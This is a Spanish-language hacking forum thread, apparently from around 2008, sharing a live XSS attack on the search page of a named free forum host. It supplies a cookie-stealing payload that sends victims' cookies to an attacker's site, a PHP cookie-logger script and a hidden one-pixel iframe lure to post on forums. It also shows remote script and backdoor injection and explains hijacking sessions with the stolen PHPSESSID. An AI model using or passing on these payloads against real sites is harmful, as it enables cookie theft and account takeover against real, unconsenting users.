en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.
el error esta en el buscador de la web "home-buscador-run.php"
link:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />y aqui la tabla para encodearla:
son los de la columna code..http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html (http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html)
la web encodeada quedaria asi: http://www.misitio.com/s.php?c=
grabador de cookies(s.php):<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>index.htm<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.
saludos!
publicado en : http://kasp.gratishost.com/xss.htm xD
Para codificar puedes usar..
javascript:x=[];for each(s in "tu-pagina-web")x.push(s.charCodeAt(0));x;
Lee la politica de disclosure.. debes colocar un enlace a una web tuya donde reportes esta vulnerabilidad.
Saludos!!
g00d, el "string line" que buscaba, me gusto hacerlo directo r0x.
thanks sirdarckgatito
-berz3k.
Ahmm no funciona en IExplorer.. porque uso algo de javascript 1.7
Esto funciona en IExplorer y Opera y Firefox:
javascript:"tu-pagina-web".replace(/./g,function(x){return x.charCodeAt(0)+","});
woow! la verdad que me sirvio ese aporte.
Mejor esto jiji:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E
Osea:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script src=http://ha.ckers.org/xss.js></script>
Aca mas info ;)
http://ha.ckers.org/xss.html
Tambien prove inyectando el Backdoor de:
http://foro.elhacker.net/index.php/topic,197376.0.html
Y funciona de maravilla:
Lo coloque en localhost para probar:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=%3Cscript%20src=http://127.0.0.1/cicklow/Hack/shell.js%3E%3C/script%3E
si funciona de maravilla el backdoor estaria bueno agregarle màs funciones ;).
aca los nuevos XSS.
http://www.foroswebgratis.com/home-buscador-run.php?buscar=><h1>XSS (http://www.foroswebgratis.com/home-buscador-run.php?buscar=><h1>XSS)
http://www.foroswebgratis.com/new_user.php?Mail="</form><h1>XSS (http://www.foroswebgratis.com/new_user.php?Mail="</form><h1>XSS)
imagenes:
http://img210.¡mageshack.us/img210/4825/xss1xb5.jpg (http://img210.xn--mageshack-pja.us/img210/4825/xss1xb5.jpg)
http://img210.¡mageshack.us/img210/4185/xss2wz2.jpg (http://img210.xn--mageshack-pja.us/img210/4185/xss2wz2.jpg)
Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..
1) porque esto SI se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>
y esto NO se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>
:huh:
2) cuando se roban cookies... son cookies de la pagina vulnerable o no?
Gracias.
Citar1) porque esto SI se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>
y esto NO se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>
Seguramente por las comillas dobles
Citar2) cuando se roban cookies... son cookies de la pagina vulnerable o no?
Depende de si el usuario que ejecuta el XSS está logueado o no, si lo está entonces seguramente si que robes cookies válidas
Cita de: Asfasfos en 8 Abril 2008, 18:00 PM
Seguramente por las comillas dobles
es verdad, porque esto SI funciona:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert()</script>
y mi duda sobre las cookies es asi:
Si las cookies robadas pertenecen a la pagina mediante la cual se esta llevando el ataque, o sea... en este caso solo se pueden robar cookies de la pagina foroswebgratis? o si la persona esta, por ejemplo, tambien logueada en otro foro al mismo tiempo... esas cookies tambien pueden ser robadas? o es necesario una vulnerabilidad similar en la otra pagina?
----------------- Minutos despues ----------------------
segui paso a paso las instrucciones y al usar el codigo en la pagina se crea un archivo log.txt que contiene valores de PHPSESSID, me aprecen 3 y son el mismo valor asi que supongo que son solo de la misma pagina (foroswebgratis)
Pero PHPSESSID no son cookies, no son un valor para definir una sesion? se puede emplear para suplantar la sesion de un usuario?
Achernar, tu te logeas con tu cuenta diciendole que quieres permanecer conectado, vomos que se descarge una cookie en tu pc para esta siempre logeado, entonces cuando tengas el valor de PHPSESSID de otro usuario lo sustituyes por el que hay en tu cookie asi suplantaras la identidad.